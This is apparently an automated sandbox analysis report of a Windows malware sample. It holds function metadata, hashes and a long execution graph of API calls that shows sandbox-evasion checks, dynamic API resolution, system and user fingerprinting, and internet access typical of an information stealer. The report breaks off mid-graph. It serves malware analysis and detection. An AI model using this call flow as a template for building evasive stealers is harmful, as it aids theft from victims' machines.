                                                                                                                                                                    Function 6E815DAD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6E81631F,00000000,6E813F27,?,00000000,?,00000000), ref: 6E815E49
                                                                                                                                                                    • GetLastError.KERNEL32(?,6E81631F,00000000,6E813F27,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6E814094), ref: 6E815E6F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 442123175-246349140
                                                                                                                                                                    • Opcode ID: dc540b4e5657c4f216e39d482df19f5b4e40ae20742d0412644aca4665d829b9
                                                                                                                                                                    • Instruction ID: 799ff64fe58996d41dc95b3aa684d7e45f7f5694c31d1e5a41050e9db02be610
                                                                                                                                                                    • Opcode Fuzzy Hash: dc540b4e5657c4f216e39d482df19f5b4e40ae20742d0412644aca4665d829b9
                                                                                                                                                                    • Instruction Fuzzy Hash: 5021A134A0861A9FDB15CF69CC809DDB7BAFB49305F1444AAE90AD7251D730EE42CFA1
                                                                                                                                                                    Function 6E80B8F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E80BCFA
                                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 6E80BDE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 3761405300-246349140
                                                                                                                                                                    • Opcode ID: 15025a216d3f5a4efd1e0b521aecfeeef5f34362f4c6229d1d2f4bfce570f017
                                                                                                                                                                    • Instruction ID: ee0c6cd3ae3824fa4a21a6f937250f4fe64e451e11422dd4ab442c613063dd32
                                                                                                                                                                    • Opcode Fuzzy Hash: 15025a216d3f5a4efd1e0b521aecfeeef5f34362f4c6229d1d2f4bfce570f017
                                                                                                                                                                    • Instruction Fuzzy Hash: 2721DFB5596B019EFB50CF5DEA92B423BA4BB4B754F10442AED4D8ABD0F3B05880CB81

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:4.6%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:3.4%
                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                    Total number of Limit Nodes:30
                                                                                                                                                                    execution_graph 75435 6c7cb8ae 75436 6c7cb8ba ___scrt_is_nonwritable_in_current_image 75435->75436 75437 6c7cb8e3 dllmain_raw 75436->75437 75438 6c7cb8de 75436->75438 75447 6c7cb8c9 75436->75447 75439 6c7cb8fd dllmain_crt_dispatch 75437->75439 75437->75447 75448 6c7abed0 DisableThreadLibraryCalls LoadLibraryExW 75438->75448 75439->75438 75439->75447 75441 6c7cb91e 75442 6c7cb94a 75441->75442 75449 6c7abed0 DisableThreadLibraryCalls LoadLibraryExW 75441->75449 75443 6c7cb953 dllmain_crt_dispatch 75442->75443 75442->75447 75445 6c7cb966 dllmain_raw 75443->75445 75443->75447 75445->75447 75446 6c7cb936 dllmain_crt_dispatch dllmain_raw 75446->75442 75448->75441 75449->75446 75450 6c7cb694 75451 6c7cb6a0 ___scrt_is_nonwritable_in_current_image 75450->75451 75480 6c7caf2a 75451->75480 75453 6c7cb6a7 75454 6c7cb796 75453->75454 75455 6c7cb6d1 75453->75455 75458 6c7cb6ac ___scrt_is_nonwritable_in_current_image 75453->75458 75497 6c7cb1f7 IsProcessorFeaturePresent 75454->75497 75484 6c7cb064 75455->75484 75459 6c7cb6e0 __RTC_Initialize 75459->75458 75487 6c7cbf89 InitializeSListHead 75459->75487 75461 6c7cb6ee ___scrt_initialize_default_local_stdio_options 75463 6c7cb6f3 _initterm_e 75461->75463 75462 6c7cb79d ___scrt_is_nonwritable_in_current_image 75464 6c7cb828 75462->75464 75465 6c7cb7d2 75462->75465 75479 6c7cb7b3 ___scrt_uninitialize_crt __RTC_Initialize 75462->75479 75463->75458 75466 6c7cb708 75463->75466 75467 6c7cb1f7 ___scrt_fastfail 6 API calls 75464->75467 75501 6c7cb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 75465->75501 75488 6c7cb072 75466->75488 75470 6c7cb82f 75467->75470 75474 6c7cb86e dllmain_crt_process_detach 75470->75474 75475 6c7cb83b 75470->75475 75471 6c7cb7d7 75502 6c7cbf95 __std_type_info_destroy_list 75471->75502 75472 6c7cb70d 75472->75458 75476 6c7cb711 _initterm 75472->75476 75478 6c7cb840 75474->75478 75477 6c7cb860 dllmain_crt_process_attach 75475->75477 75475->75478 75476->75458 75477->75478 75481 6c7caf33 75480->75481 75503 6c7cb341 IsProcessorFeaturePresent 75481->75503 75483 6c7caf3f ___scrt_uninitialize_crt 75483->75453 75504 6c7caf8b 75484->75504 75486 6c7cb06b 75486->75459 75487->75461 75489 6c7cb077 ___scrt_release_startup_lock 75488->75489 75490 6c7cb07b 75489->75490 75491 6c7cb082 75489->75491 75514 6c7cb341 IsProcessorFeaturePresent 75490->75514 75494 6c7cb087 _configure_narrow_argv 75491->75494 75493 6c7cb080 75493->75472 75495 6c7cb095 _initialize_narrow_environment 75494->75495 75496 6c7cb092 75494->75496 75495->75493 75496->75472 75498 6c7cb20c ___scrt_fastfail 75497->75498 75499 6c7cb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 75498->75499 75500 6c7cb302 ___scrt_fastfail 75499->75500 75500->75462 75501->75471 75502->75479 75503->75483 75505 6c7caf9a 75504->75505 75506 6c7caf9e 75504->75506 75505->75486 75507 6c7cb028 75506->75507 75508 6c7cafab ___scrt_release_startup_lock 75506->75508 75509 6c7cb1f7 ___scrt_fastfail 6 API calls 75507->75509 75511 6c7cafb8 _initialize_onexit_table 75508->75511 75512 6c7cafd6 75508->75512 75510 6c7cb02f 75509->75510 75511->75512 75513 6c7cafc7 _initialize_onexit_table 75511->75513 75512->75486 75513->75512 75514->75493 75515 6c793060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 75520 6c7cab2a 75515->75520 75519 6c7930db 75524 6c7cae0c _crt_atexit _register_onexit_function 75520->75524 75522 6c7930cd 75523 6c7cb320 5 API calls ___raise_securityfailure 75522->75523 75523->75519 75524->75522 75525 6c7935a0 75526 6c7935c4 InitializeCriticalSectionAndSpinCount getenv 75525->75526 75541 6c793846 __aulldiv 75525->75541 75527 6c7938fc strcmp 75526->75527 75528 6c7935f3 __aulldiv 75526->75528 75527->75528 75532 6c793912 strcmp 75527->75532 75530 6c7935f8 QueryPerformanceFrequency 75528->75530 75533 6c793622 _strnicmp 75528->75533 75534 6c793944 _strnicmp 75528->75534 75536 6c79395d 75528->75536 75537 6c793664 GetSystemTimeAdjustment 75528->75537 75539 6c79375c 75528->75539 75530->75528 75531 6c7938f4 75532->75528 75533->75528 75533->75534 75534->75528 75534->75536 75535 6c79376a QueryPerformanceCounter EnterCriticalSection 75538 6c7937b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 75535->75538 75535->75539 75537->75528 75538->75539 75540 6c7937fc LeaveCriticalSection 75538->75540 75539->75535 75539->75538 75539->75540 75539->75541 75540->75539 75540->75541 75542 6c7cb320 5 API calls ___raise_securityfailure 75541->75542 75542->75531 75543 6c7ac930 GetSystemInfo VirtualAlloc 75544 6c7ac9a3 GetSystemInfo 75543->75544 75545 6c7ac973 75543->75545 75547 6c7ac9d0 75544->75547 75548 6c7ac9b6 75544->75548 75559 6c7cb320 5 API calls ___raise_securityfailure 75545->75559 75547->75545 75551 6c7ac9d8 VirtualAlloc 75547->75551 75548->75547 75550 6c7ac9bd 75548->75550 75549 6c7ac99b 75550->75545 75554 6c7ac9c1 VirtualFree 75550->75554 75552 6c7ac9ec 75551->75552 75553 6c7ac9f0 75551->75553 75552->75545 75560 6c7ccbe8 GetCurrentProcess TerminateProcess 75553->75560 75554->75545 75559->75549 75561 6c7cb830 75562 6c7cb86e dllmain_crt_process_detach 75561->75562 75563 6c7cb83b 75561->75563 75565 6c7cb840 75562->75565 75564 6c7cb860 dllmain_crt_process_attach 75563->75564 75563->75565 75564->75565 75566 6c7cb9c0 75567 6c7cb9ce dllmain_dispatch 75566->75567 75568 6c7cb9c9 75566->75568 75570 6c7cbef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 75568->75570 75570->75567 75571 4184ae 75572 4184b0 75571->75572 75623 402b68 75572->75623 75581 401284 25 API calls 75582 4184df 75581->75582 75583 401284 25 API calls 75582->75583 75584 4184e9 75583->75584 75738 40148a GetPEB 75584->75738 75586 4184f3 75587 401284 25 API calls 75586->75587 75588 4184fd 75587->75588 75589 401284 25 API calls 75588->75589 75590 418507 75589->75590 75591 401284 25 API calls 75590->75591 75592 418511 75591->75592 75739 4014a2 GetPEB 75592->75739 75594 41851b 75595 401284 25 API calls 75594->75595 75596 418525 75595->75596 75597 401284 25 API calls 75596->75597 75598 41852f 75597->75598 75599 401284 25 API calls 75598->75599 75600 418539 75599->75600 75740 4014f9 75600->75740 75603 401284 25 API calls 75604 41854d 75603->75604 75605 401284 25 API calls 75604->75605 75606 418557 75605->75606 75607 401284 25 API calls 75606->75607 75608 418561 75607->75608 75763 401666 GetTempPathW 75608->75763 75611 401284 25 API calls 75612 418570 75611->75612 75613 401284 25 API calls 75612->75613 75614 41857a 75613->75614 75615 401284 25 API calls 75614->75615 75616 418584 75615->75616 75775 417041 75616->75775 76200 4047e8 GetProcessHeap HeapAlloc 75623->76200 75626 4047e8 3 API calls 75627 402b93 75626->75627 75628 4047e8 3 API calls 75627->75628 75629 402bac 75628->75629 75630 4047e8 3 API calls 75629->75630 75631 402bc3 75630->75631 75632 4047e8 3 API calls 75631->75632 75633 402bda 75632->75633 75634 4047e8 3 API calls 75633->75634 75635 402bf0 75634->75635 75636 4047e8 3 API calls 75635->75636 75637 402c07 75636->75637 75638 4047e8 3 API calls 75637->75638 75639 402c1e 75638->75639 75640 4047e8 3 API calls 75639->75640 75641 402c38 75640->75641 75642 4047e8 3 API calls 75641->75642 75643 402c4f 75642->75643 75644 4047e8 3 API calls 75643->75644 75645 402c66 75644->75645 75646 4047e8 3 API calls 75645->75646 75647 402c7d 75646->75647 75648 4047e8 3 API calls 75647->75648 75649 402c93 75648->75649 75650 4047e8 3 API calls 75649->75650 75651 402caa 75650->75651 75652 4047e8 3 API calls 75651->75652 75653 402cc1 75652->75653 75654 4047e8 3 API calls 75653->75654 75655 402cd8 75654->75655 75656 4047e8 3 API calls 75655->75656 75657 402cf2 75656->75657 75658 4047e8 3 API calls 75657->75658 75659 402d09 75658->75659 75660 4047e8 3 API calls 75659->75660 75661 402d20 75660->75661 75662 4047e8 3 API calls 75661->75662 75663 402d37 75662->75663 75664 4047e8 3 API calls 75663->75664 75665 402d4e 75664->75665 75666 4047e8 3 API calls 75665->75666 75667 402d65 75666->75667 75668 4047e8 3 API calls 75667->75668 75669 402d7c 75668->75669 75670 4047e8 3 API calls 75669->75670 75671 402d92 75670->75671 75672 4047e8 3 API calls 75671->75672 75673 402dac 75672->75673 75674 4047e8 3 API calls 75673->75674 75675 402dc3 75674->75675 75676 4047e8 3 API calls 75675->75676 75677 402dda 75676->75677 75678 4047e8 3 API calls 75677->75678 75679 402df1 75678->75679 75680 4047e8 3 API calls 75679->75680 75681 402e07 75680->75681 75682 4047e8 3 API calls 75681->75682 75683 402e1e 75682->75683 75684 4047e8 3 API calls 75683->75684 75685 402e35 75684->75685 75686 4047e8 3 API calls 75685->75686 75687 402e4c 75686->75687 75688 4047e8 3 API calls 75687->75688 75689 402e66 75688->75689 75690 4047e8 3 API calls 75689->75690 75691 402e7d 75690->75691 75692 4047e8 3 API calls 75691->75692 75693 402e94 75692->75693 75694 4047e8 3 API calls 75693->75694 75695 402eaa 75694->75695 75696 4047e8 3 API calls 75695->75696 75697 402ec1 75696->75697 75698 4047e8 3 API calls 75697->75698 75699 402ed8 75698->75699 75700 4047e8 3 API calls 75699->75700 75701 402eec 75700->75701 75702 4047e8 3 API calls 75701->75702 75703 402f03 75702->75703 75704 418643 75703->75704 76204 41859a GetPEB 75704->76204 75706 418649 75707 418844 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 75706->75707 75708 418659 75706->75708 75709 4188a3 GetProcAddress 75707->75709 75710 4188b5 75707->75710 75717 418673 20 API calls 75708->75717 75709->75710 75711 4188e7 75710->75711 75712 4188be GetProcAddress GetProcAddress 75710->75712 75713 4188f0 GetProcAddress 75711->75713 75714 418902 75711->75714 75712->75711 75713->75714 75715 41890b GetProcAddress 75714->75715 75716 41891d 75714->75716 75715->75716 75718 418926 GetProcAddress GetProcAddress 75716->75718 75719 4184c1 75716->75719 75717->75707 75718->75719 75720 4010f0 GetCurrentProcess VirtualAllocExNuma 75719->75720 75721 401111 ExitProcess 75720->75721 75722 401098 VirtualAlloc 75720->75722 75724 4010b8 _memset 75722->75724 75725 4010ec 75724->75725 75726 4010d5 VirtualFree 75724->75726 75727 401284 75725->75727 75726->75725 75728 4012ac _memset 75727->75728 75729 4012bb 13 API calls 75728->75729 76205 410c85 GetProcessHeap HeapAlloc GetComputerNameA 75729->76205 75731 4013e9 76207 41d016 75731->76207 75735 4013f4 75735->75581 75736 4013b9 75736->75731 75737 4013e2 ExitProcess 75736->75737 75738->75586 75739->75594 76217 4014ad GetPEB 75740->76217 75743 4014ad 2 API calls 75744 401516 75743->75744 75745 4014ad 2 API calls 75744->75745 75762 4015a1 75744->75762 75746 401529 75745->75746 75747 4014ad 2 API calls 75746->75747 75746->75762 75748 401538 75747->75748 75749 4014ad 2 API calls 75748->75749 75748->75762 75750 401547 75749->75750 75751 4014ad 2 API calls 75750->75751 75750->75762 75752 401556 75751->75752 75753 4014ad 2 API calls 75752->75753 75752->75762 75754 401565 75753->75754 75755 4014ad 2 API calls 75754->75755 75754->75762 75756 401574 75755->75756 75757 4014ad 2 API calls 75756->75757 75756->75762 75758 401583 75757->75758 75759 4014ad 2 API calls 75758->75759 75758->75762 75760 401592 75759->75760 75761 4014ad 2 API calls 75760->75761 75760->75762 75761->75762 75762->75603 75764 4016a4 wsprintfW 75763->75764 75765 4017f7 75763->75765 75766 4016d0 CreateFileW 75764->75766 75767 41d016 __setmbcp_nolock 5 API calls 75765->75767 75766->75765 75768 4016fb GetProcessHeap RtlAllocateHeap _time64 srand rand 75766->75768 75769 401807 75767->75769 75773 401754 _memset 75768->75773 75769->75611 75770 401733 WriteFile 75770->75765 75770->75773 75771 401768 CloseHandle CreateFileW 75771->75765 75772 40179e ReadFile 75771->75772 75772->75765 75772->75773 75773->75765 75773->75770 75773->75771 75774 4017c3 GetProcessHeap RtlFreeHeap CloseHandle 75773->75774 75774->75765 75774->75766 75776 417051 75775->75776 76221 4104e7 75776->76221 75780 417080 76226 410609 lstrlenA 75780->76226 75783 410609 3 API calls 75784 4170a5 75783->75784 75785 410609 3 API calls 75784->75785 75786 4170ae 75785->75786 76230 41058d 75786->76230 75788 4170ba 75789 4170e3 OpenEventA 75788->75789 75790 4170f6 CreateEventA 75789->75790 75791 4170dc CloseHandle 75789->75791 75792 4104e7 lstrcpyA 75790->75792 75791->75789 75793 41711e 75792->75793 76234 410549 lstrlenA 75793->76234 75796 410549 2 API calls 75797 417185 75796->75797 76238 402f12 75797->76238 75800 418950 121 API calls 75801 4172ca 75800->75801 75802 4104e7 lstrcpyA 75801->75802 76017 41757f 75801->76017 75804 4172e5 75802->75804 75806 410609 3 API calls 75804->75806 75808 4172f7 75806->75808 75807 41058d lstrcpyA 75809 4175af 75807->75809 75810 41058d lstrcpyA 75808->75810 75812 4104e7 lstrcpyA 75809->75812 75811 417300 75810->75811 75815 410609 3 API calls 75811->75815 75813 4175c6 75812->75813 75814 410609 3 API calls 75813->75814 75816 4175d9 75814->75816 75817 41731b 75815->75817 76810 4105c7 75816->76810 75818 41058d lstrcpyA 75817->75818 75820 417324 75818->75820 75823 410609 3 API calls 75820->75823 75822 41058d lstrcpyA 75826 4175f2 75822->75826 75824 41733f 75823->75824 75825 41058d lstrcpyA 75824->75825 75827 417348 75825->75827 75828 417604 CreateDirectoryA 75826->75828 75832 410609 3 API calls 75827->75832 76814 401cfd 75828->76814 75834 417363 75832->75834 75833 41762e 76898 41824d 75833->76898 75836 41058d lstrcpyA 75834->75836 75838 41736c 75836->75838 75837 41763f 75840 41058d lstrcpyA 75837->75840 75839 410609 3 API calls 75838->75839 75841 417387 75839->75841 75842 417656 75840->75842 75843 41058d lstrcpyA 75841->75843 75844 41058d lstrcpyA 75842->75844 75845 417390 75843->75845 75846 417666 75844->75846 75849 410609 3 API calls 75845->75849 76905 410519 75846->76905 75851 4173ab 75849->75851 75850 410609 3 API calls 75852 417685 75850->75852 75853 41058d lstrcpyA 75851->75853 75854 41058d lstrcpyA 75852->75854 75855 4173b4 75853->75855 75856 41768e 75854->75856 75858 410609 3 API calls 75855->75858 75857 4105c7 2 API calls 75856->75857 75859 4176ab 75857->75859 75860 4173cf 75858->75860 75861 41058d lstrcpyA 75859->75861 75862 41058d lstrcpyA 75860->75862 75863 4176b4 75861->75863 75864 4173d8 75862->75864 75865 4176bd InternetOpenA InternetOpenA 75863->75865 75866 410609 3 API calls 75864->75866 75867 410519 lstrcpyA 75865->75867 75868 4173f3 75866->75868 75869 417707 75867->75869 75870 41058d lstrcpyA 75868->75870 75871 4104e7 lstrcpyA 75869->75871 75872 4173fc 75870->75872 75873 417716 75871->75873 75876 410609 3 API calls 75872->75876 76909 4109a2 GetWindowsDirectoryA 75873->76909 75878 417417 75876->75878 75877 410519 lstrcpyA 75879 417731 75877->75879 75881 41058d lstrcpyA 75878->75881 76927 404b2e 75879->76927 75883 417420 75881->75883 75886 410609 3 API calls 75883->75886 75885 417744 75887 4104e7 lstrcpyA 75885->75887 75888 41743b 75886->75888 75890 417779 75887->75890 75889 41058d lstrcpyA 75888->75889 75891 417444 75889->75891 75892 401cfd lstrcpyA 75890->75892 75895 410609 3 API calls 75891->75895 75893 41778a 75892->75893 77077 405f39 75893->77077 75897 41745f 75895->75897 75899 41058d lstrcpyA 75897->75899 75901 417468 75899->75901 75900 4177a2 75902 4104e7 lstrcpyA 75900->75902 75906 410609 3 API calls 75901->75906 75903 4177b6 75902->75903 75904 401cfd lstrcpyA 75903->75904 75905 4177c0 75904->75905 75907 405f39 43 API calls 75905->75907 75908 417483 75906->75908 75909 4177cc 75907->75909 75910 41058d lstrcpyA 75908->75910 77250 413259 strtok_s 75909->77250 75912 41748c 75910->75912 75915 410609 3 API calls 75912->75915 75913 4177df 75914 4104e7 lstrcpyA 75913->75914 75916 4177f2 75914->75916 75917 4174a7 75915->75917 75918 401cfd lstrcpyA 75916->75918 75919 41058d lstrcpyA 75917->75919 75920 417803 75918->75920 75921 4174b0 75919->75921 75922 405f39 43 API calls 75920->75922 75925 410609 3 API calls 75921->75925 75923 41780f 75922->75923 77259 413390 strtok_s 75923->77259 75927 4174cb 75925->75927 75926 417822 75928 401cfd lstrcpyA 75926->75928 75929 41058d lstrcpyA 75927->75929 75930 417833 75928->75930 75932 4174d4 75929->75932 77266 413b86 75930->77266 75936 410609 3 API calls 75932->75936 75938 4174ef 75936->75938 75940 41058d lstrcpyA 75938->75940 75942 4174f8 75940->75942 75945 410609 3 API calls 75942->75945 75947 417513 75945->75947 75949 41058d lstrcpyA 75947->75949 75951 41751c 75949->75951 75958 410609 3 API calls 75951->75958 75963 417537 75958->75963 75967 41058d lstrcpyA 75963->75967 75971 417540 75967->75971 75982 410609 3 API calls 75971->75982 75987 41755b 75982->75987 75988 41058d lstrcpyA 75987->75988 75992 417564 75988->75992 76793 41257f 75992->76793 76012 41cc6c 10 API calls 76012->76017 76802 411c4a 76017->76802 76201 402b7c 76200->76201 76202 40480f 76200->76202 76201->75626 76203 404818 lstrlenA 76202->76203 76203->76201 76203->76203 76204->75706 76206 401385 76205->76206 76206->75731 76215 410c53 GetProcessHeap RtlAllocateHeap GetUserNameA 76206->76215 76208 41d020 IsDebuggerPresent 76207->76208 76209 41d01e 76207->76209 76216 41d975 76208->76216 76209->75735 76212 41d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 76213 41d485 GetCurrentProcess TerminateProcess 76212->76213 76214 41d47d __call_reportfault 76212->76214 76213->75735 76214->76213 76215->75736 76216->76212 76218 4014e9 76217->76218 76219 4014d9 lstrcmpiW 76218->76219 76220 4014ef 76218->76220 76219->76218 76219->76220 76220->75743 76220->75762 76222 4104f2 76221->76222 76223 410513 76222->76223 76224 410509 lstrcpyA 76222->76224 76225 410c53 GetProcessHeap RtlAllocateHeap GetUserNameA 76223->76225 76224->76223 76225->75780 76228 410630 76226->76228 76227 410656 76227->75783 76228->76227 76229 410643 lstrcpyA lstrcatA 76228->76229 76229->76227 76231 41059c 76230->76231 76232 4105c3 76231->76232 76233 4105bb lstrcpyA 76231->76233 76232->75788 76233->76232 76236 41055e 76234->76236 76235 410587 76235->75796 76236->76235 76237 41057d lstrcpyA 76236->76237 76237->76235 76239 4047e8 3 API calls 76238->76239 76240 402f27 76239->76240 76241 4047e8 3 API calls 76240->76241 76242 402f3e 76241->76242 76243 4047e8 3 API calls 76242->76243 76244 402f55 76243->76244 76245 4047e8 3 API calls 76244->76245 76246 402f6c 76245->76246 76247 4047e8 3 API calls 76246->76247 76248 402f85 76247->76248 76249 4047e8 3 API calls 76248->76249 76250 402f9c 76249->76250 76251 4047e8 3 API calls 76250->76251 76252 402fb3 76251->76252 76253 4047e8 3 API calls 76252->76253 76254 402fca 76253->76254 76255 4047e8 3 API calls 76254->76255 76256 402fe4 76255->76256 76257 4047e8 3 API calls 76256->76257 76258 402ffb 76257->76258 76259 4047e8 3 API calls 76258->76259 76260 403011 76259->76260 76261 4047e8 3 API calls 76260->76261 76262 403028 76261->76262 76263 4047e8 3 API calls 76262->76263 76264 40303f 76263->76264 76265 4047e8 3 API calls 76264->76265 76266 403056 76265->76266 76267 4047e8 3 API calls 76266->76267 76268 40306d 76267->76268 76269 4047e8 3 API calls 76268->76269 76270 403084 76269->76270 76271 4047e8 3 API calls 76270->76271 76272 40309b 76271->76272 76273 4047e8 3 API calls 76272->76273 76274 4030b2 76273->76274 76275 4047e8 3 API calls 76274->76275 76276 4030c9 76275->76276 76277 4047e8 3 API calls 76276->76277 76278 4030df 76277->76278 76279 4047e8 3 API calls 76278->76279 76280 4030f6 76279->76280 76281 4047e8 3 API calls 76280->76281 76282 40310f 76281->76282 76283 4047e8 3 API calls 76282->76283 76284 403123 76283->76284 76285 4047e8 3 API calls 76284->76285 76286 40313a 76285->76286 76287 4047e8 3 API calls 76286->76287 76288 403154 76287->76288 76289 4047e8 3 API calls 76288->76289 76290 40316b 76289->76290 76291 4047e8 3 API calls 76290->76291 76292 403182 76291->76292 76293 4047e8 3 API calls 76292->76293 76294 403199 76293->76294 76295 4047e8 3 API calls 76294->76295 76296 4031af 76295->76296 76297 4047e8 3 API calls 76296->76297 76298 4031c5 76297->76298 76299 4047e8 3 API calls 76298->76299 76300 4031dc 76299->76300 76301 4047e8 3 API calls 76300->76301 76302 4031f2 76301->76302 76303 4047e8 3 API calls 76302->76303 76304 40320c 76303->76304 76305 4047e8 3 API calls 76304->76305 76306 403223 76305->76306 76307 4047e8 3 API calls 76306->76307 76308 40323a 76307->76308 76309 4047e8 3 API calls 76308->76309 76310 403250 76309->76310 76311 4047e8 3 API calls 76310->76311 76312 403267 76311->76312 76313 4047e8 3 API calls 76312->76313 76314 40327e 76313->76314 76315 4047e8 3 API calls 76314->76315 76316 403295 76315->76316 76317 4047e8 3 API calls 76316->76317 76318 4032ab 76317->76318 76319 4047e8 3 API calls 76318->76319 76320 4032c2 76319->76320 76321 4047e8 3 API calls 76320->76321 76322 4032d9 76321->76322 76323 4047e8 3 API calls 76322->76323 76324 4032f0 76323->76324 76325 4047e8 3 API calls 76324->76325 76326 403306 76325->76326 76327 4047e8 3 API calls 76326->76327 76328 40331c 76327->76328 76329 4047e8 3 API calls 76328->76329 76330 403333 76329->76330 76331 4047e8 3 API calls 76330->76331 76332 403349 76331->76332 76333 4047e8 3 API calls 76332->76333 76334 40335d 76333->76334 76335 4047e8 3 API calls 76334->76335 76336 403374 76335->76336 76337 4047e8 3 API calls 76336->76337 76338 40338a 76337->76338 76339 4047e8 3 API calls 76338->76339 76340 4033a1 76339->76340 76341 4047e8 3 API calls 76340->76341 76342 4033b8 76341->76342 76343 4047e8 3 API calls 76342->76343 76344 4033cf 76343->76344 76345 4047e8 3 API calls 76344->76345 76346 4033e6 76345->76346 76347 4047e8 3 API calls 76346->76347 76348 4033fd 76347->76348 76349 4047e8 3 API calls 76348->76349 76350 403414 76349->76350 76351 4047e8 3 API calls 76350->76351 76352 40342e 76351->76352 76353 4047e8 3 API calls 76352->76353 76354 403445 76353->76354 76355 4047e8 3 API calls 76354->76355 76356 40345c 76355->76356 76357 4047e8 3 API calls 76356->76357 76358 403473 76357->76358 76359 4047e8 3 API calls 76358->76359 76360 40348a 76359->76360 76361 4047e8 3 API calls 76360->76361 76362 4034a1 76361->76362 76363 4047e8 3 API calls 76362->76363 76364 4034b8 76363->76364 76365 4047e8 3 API calls 76364->76365 76366 4034cf 76365->76366 76367 4047e8 3 API calls 76366->76367 76368 4034e9 76367->76368 76369 4047e8 3 API calls 76368->76369 76370 403500 76369->76370 76371 4047e8 3 API calls 76370->76371 76372 403517 76371->76372 76373 4047e8 3 API calls 76372->76373 76374 40352e 76373->76374 76375 4047e8 3 API calls 76374->76375 76376 403545 76375->76376 76377 4047e8 3 API calls 76376->76377 76378 40355c 76377->76378 76379 4047e8 3 API calls 76378->76379 76380 403573 76379->76380 76381 4047e8 3 API calls 76380->76381 76382 40358a 76381->76382 76383 4047e8 3 API calls 76382->76383 76384 4035a4 76383->76384 76385 4047e8 3 API calls 76384->76385 76386 4035bb 76385->76386 76387 4047e8 3 API calls 76386->76387 76388 4035d2 76387->76388 76389 4047e8 3 API calls 76388->76389 76390 4035e9 76389->76390 76391 4047e8 3 API calls 76390->76391 76392 403600 76391->76392 76393 4047e8 3 API calls 76392->76393 76394 403617 76393->76394 76395 4047e8 3 API calls 76394->76395 76396 40362d 76395->76396 76397 4047e8 3 API calls 76396->76397 76398 403643 76397->76398 76399 4047e8 3 API calls 76398->76399 76400 40365d 76399->76400 76401 4047e8 3 API calls 76400->76401 76402 403674 76401->76402 76403 4047e8 3 API calls 76402->76403 76404 40368b 76403->76404 76405 4047e8 3 API calls 76404->76405 76406 4036a1 76405->76406 76407 4047e8 3 API calls 76406->76407 76408 4036b8 76407->76408 76409 4047e8 3 API calls 76408->76409 76410 4036cf 76409->76410 76411 4047e8 3 API calls 76410->76411 76412 4036e3 76411->76412 76413 4047e8 3 API calls 76412->76413 76414 4036f9 76413->76414 76415 4047e8 3 API calls 76414->76415 76416 403713 76415->76416 76417 4047e8 3 API calls 76416->76417 76418 40372a 76417->76418 76419 4047e8 3 API calls 76418->76419 76420 403741 76419->76420 76421 4047e8 3 API calls 76420->76421 76422 403758 76421->76422 76423 4047e8 3 API calls 76422->76423 76424 40376f 76423->76424 76425 4047e8 3 API calls 76424->76425 76426 403786 76425->76426 76427 4047e8 3 API calls 76426->76427 76428 40379a 76427->76428 76429 4047e8 3 API calls 76428->76429 76430 